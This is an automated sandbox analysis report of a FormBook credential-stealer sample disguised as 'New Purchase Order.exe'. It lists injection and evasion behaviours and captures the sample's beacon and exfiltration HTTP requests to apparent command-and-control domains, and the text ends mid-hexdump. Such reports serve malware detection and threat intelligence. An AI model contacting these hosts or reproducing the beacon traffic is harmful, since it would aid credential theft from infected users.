Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New Purchase Order.exe

Overview

General Information

Sample name:New Purchase Order.exe
Analysis ID:1567410
MD5:225b541dd84b7d8cbd7cb719a80e4df9
SHA1:192a656a280cf136ac1cc91019bf28b057cc7a50
SHA256:d9984c8e232d51fee8996efff6a296be9fa8f9957435269d0c23e1b1fd4eb061
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • New Purchase Order.exe (PID: 6016 cmdline: "C:\Users\user\Desktop\New Purchase Order.exe" MD5: 225B541DD84B7D8CBD7CB719A80E4DF9)
    • New Purchase Order.exe (PID: 7348 cmdline: "C:\Users\user\Desktop\New Purchase Order.exe" MD5: 225B541DD84B7D8CBD7CB719A80E4DF9)
      • ILRIqlNpKN.exe (PID: 7000 cmdline: "C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • isoburn.exe (PID: 7812 cmdline: "C:\Windows\SysWOW64\isoburn.exe" MD5: BF19DD525C7D23CAFC086E9CCB9C06C6)
          • ILRIqlNpKN.exe (PID: 3644 cmdline: "C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8060 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.2504764936.0000000004FB0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000C.00000002.2504595570.0000000004F60000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.1802340640.00000000015B0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000F.00000002.2507216654.00000000051A0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.2.New Purchase Order.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              8.2.New Purchase Order.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: New Purchase Order.exeReversingLabs: Detection: 42%
                Yara detected FormBook
                Source: Yara matchFile source: 8.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.2504764936.0000000004FB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2504595570.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1802340640.00000000015B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2507216654.00000000051A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1801600414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2505024909.0000000002BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1804003305.0000000001A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: New Purchase Order.exeJoe Sandbox ML: detected
                Source: New Purchase Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: New Purchase Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: isoburn.pdb source: New Purchase Order.exe, 00000008.00000002.1801973908.0000000001267000.00000004.00000020.00020000.00000000.sdmp, ILRIqlNpKN.exe, 0000000B.00000002.2502956260.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: isoburn.pdbGCTL source: New Purchase Order.exe, 00000008.00000002.1801973908.0000000001267000.00000004.00000020.00020000.00000000.sdmp, ILRIqlNpKN.exe, 0000000B.00000002.2502956260.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ILRIqlNpKN.exe, 0000000B.00000000.1709984253.0000000000EBE000.00000002.00000001.01000000.0000000D.sdmp, ILRIqlNpKN.exe, 0000000F.00000000.1887839334.0000000000EBE000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: New Purchase Order.exe, 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.1805994702.0000000005033000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.1802114946.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: New Purchase Order.exe, New Purchase Order.exe, 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 0000000C.00000003.1805994702.0000000005033000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.1802114946.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FAC4E0 FindFirstFileW,FindNextFileW,FindClose,12_2_02FAC4E0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then xor eax, eax12_2_02F99E40
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then mov ebx, 00000004h12_2_050B04F8

                Networking

                barindex
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.cyperla.xyz
                Source: Joe Sandbox ViewIP Address: 103.224.182.242 103.224.182.242
                Source: Joe Sandbox ViewASN Name: BETAINTERNATIONALTR BETAINTERNATIONALTR
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 13:42:41 GMTserver: Apacheset-cookie: __tad=1733233361.3016953; expires=Fri, 01-Dec-2034 13:42:41 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 34 9b 65 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b f3 a7 38 bf cc 1c fa a1 a5 70 fe 00 61 3f 15 76 41 67 b0 93 9c 9f 10 d9 4e fb 50 ec 53 b5 1a 61 aa 45 f9 68 29 7d 76 37 3f 9d fe 5f bb 42 99 91 10 74 1f 81 b1 aa 49 d1 b9 b1 e3 7f 7f 87 b1 ab 2f 47 8e 0e 3c c5 70 67 2b 6e 34 04 ec da d9 c1 54 cb b3 cb c5 a5 ba ba 86 23 30 7a 04 31 6d ba 0c 23 fa 6e ad 6c 6b 9d 88 cf ea 71 c5 10 26 96 b7 8b 71 f1 bc 16 95 de c1 c8 15 49 a5 3d ab 3f 2c c1 58 83 ab a4 2c 24 34 0e 6b f1 cf f9 0d 93 70 95 94 1f 5a ad b6 d0 a0 c3 71 50 0d a1 2b 72 c9 17 87 f3 73 15 63 27 37 45 87 c4 69 39 e1 05 fe 1c f4 4e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 62 05 df 6f be 88 d7 aa be 0d f7 f2 29 31 3b 0f 96 c7 0e 84 bf c2 2f 48 65 37 98 1c 04 00 00 Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 13:42:44 GMTserver: Apacheset-cookie: __tad=1733233364.5099805; expires=Fri, 01-Dec-2034 13:42:44 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 34 9b 65 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b f3 a7 38 bf cc 1c fa a1 a5 70 fe 00 61 3f 15 76 41 67 b0 93 9c 9f 10 d9 4e fb 50 ec 53 b5 1a 61 aa 45 f9 68 29 7d 76 37 3f 9d fe 5f bb 42 99 91 10 74 1f 81 b1 aa 49 d1 b9 b1 e3 7f 7f 87 b1 ab 2f 47 8e 0e 3c c5 70 67 2b 6e 34 04 ec da d9 c1 54 cb b3 cb c5 a5 ba ba 86 23 30 7a 04 31 6d ba 0c 23 fa 6e ad 6c 6b 9d 88 cf ea 71 c5 10 26 96 b7 8b 71 f1 bc 16 95 de c1 c8 15 49 a5 3d ab 3f 2c c1 58 83 ab a4 2c 24 34 0e 6b f1 cf f9 0d 93 70 95 94 1f 5a ad b6 d0 a0 c3 71 50 0d a1 2b 72 c9 17 87 f3 73 15 63 27 37 45 87 c4 69 39 e1 05 fe 1c f4 4e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 62 05 df 6f be 88 d7 aa be 0d f7 f2 29 31 3b 0f 96 c7 0e 84 bf c2 2f 48 65 37 98 1c 04 00 00 Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 13:42:47 GMTserver: Apacheset-cookie: __tad=1733233367.6311852; expires=Fri, 01-Dec-2034 13:42:47 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 34 9b 65 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b f3 a7 38 bf cc 1c fa a1 a5 70 fe 00 61 3f 15 76 41 67 b0 93 9c 9f 10 d9 4e fb 50 ec 53 b5 1a 61 aa 45 f9 68 29 7d 76 37 3f 9d fe 5f bb 42 99 91 10 74 1f 81 b1 aa 49 d1 b9 b1 e3 7f 7f 87 b1 ab 2f 47 8e 0e 3c c5 70 67 2b 6e 34 04 ec da d9 c1 54 cb b3 cb c5 a5 ba ba 86 23 30 7a 04 31 6d ba 0c 23 fa 6e ad 6c 6b 9d 88 cf ea 71 c5 10 26 96 b7 8b 71 f1 bc 16 95 de c1 c8 15 49 a5 3d ab 3f 2c c1 58 83 ab a4 2c 24 34 0e 6b f1 cf f9 0d 93 70 95 94 1f 5a ad b6 d0 a0 c3 71 50 0d a1 2b 72 c9 17 87 f3 73 15 63 27 37 45 87 c4 69 39 e1 05 fe 1c f4 4e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 62 05 df 6f be 88 d7 aa be 0d f7 f2 29 31 3b 0f 96 c7 0e 84 bf c2 2f 48 65 37 98 1c 04 00 00 Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7
                Source: global trafficHTTP traffic detected: GET /qygv/?Z4=CrodyR&HZ=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4WnueYbl0MlUQedog3ODQ7MufRvJpC6GuxIcFfxXtcYIG+pMPKAdgLM64C HTTP/1.1Host: www.cyperla.xyzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qx5d/?HZ=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iPupPRQa5YnsqE2u4tLTeO6fSmNSULxsWJgPs8P1zGJQzra9DrAEYIvPdA&Z4=CrodyR HTTP/1.1Host: www.cstrategy.onlineAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6ou6/?HZ=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t4Wjx9MdK2LZUtOM2FmXlL5GxHvEoA3gFavIudvI/vR7LkiZUXjXX7Xfe&Z4=CrodyR HTTP/1.1Host: www.madhf.techAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /v89f/?HZ=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9k3LEpkgrWWSGAJgqoML7k7rmuMTR7pR2QKok4A/6U1dLUrAezCoD2ZYZu&Z4=CrodyR HTTP/1.1Host: www.bser101pp.buzzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.cyperla.xyz
                Source: global trafficDNS traffic detected: DNS query: www.cstrategy.online
                Source: global trafficDNS traffic detected: DNS query: www.madhf.tech
                Source: global trafficDNS traffic detected: DNS query: www.bser101pp.buzz
                Source: unknownHTTP traffic detected: POST /qx5d/ HTTP/1.1Host: www.cstrategy.onlineAccept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-usOrigin: http://www.cstrategy.onlineContent-Length: 215Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedReferer: http://www.cstrategy.online/qx5d/User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36Data Raw: 48 5a 3d 46 77 38 77 6f 52 36 55 79 51 6e 46 44 78 64 31 62 75 6c 54 34 6b 37 44 56 4f 49 66 61 65 35 6a 50 48 7a 4d 77 72 6e 39 48 44 47 43 56 42 75 2b 44 35 62 70 4c 42 73 74 51 71 57 68 42 33 79 6c 68 46 4e 78 2f 49 62 6b 2f 55 44 39 38 47 73 64 52 6d 4f 76 70 4a 50 58 54 2b 46 52 70 35 69 74 6d 37 77 76 4f 46 79 46 2b 4b 2b 33 47 6a 5a 32 30 4c 6e 65 68 76 4d 6a 55 33 2f 78 44 6b 50 43 58 70 57 4d 4f 6c 30 41 75 39 49 51 45 77 61 74 64 51 79 47 65 74 52 30 4e 36 6e 63 64 46 4a 65 59 6a 30 70 54 43 6f 42 30 56 47 58 4f 52 48 65 79 65 62 4f 47 79 75 77 63 77 73 75 78 4a 35 46 42 73 31 4e 75 4a 71 4d 2b 6b 65 44 49 6d 78 2b 72 67 3d 3d Data Ascii: HZ=Fw8woR6UyQnFDxd1bulT4k7DVOIfae5jPHzMwrn9HDGCVBu+D5bpLBstQqWhB3ylhFNx/Ibk/UD98GsdRmOvpJPXT+FRp5itm7wvOFyF+K+3GjZ20LnehvMjU3/xDkPCXpWMOl0Au9IQEwatdQyGetR0N6ncdFJeYj0pTCoB0VGXORHeyebOGyuwcwsuxJ5FBs1NuJqM+keDImx+rg==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 03 Dec 2024 13:42:08 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
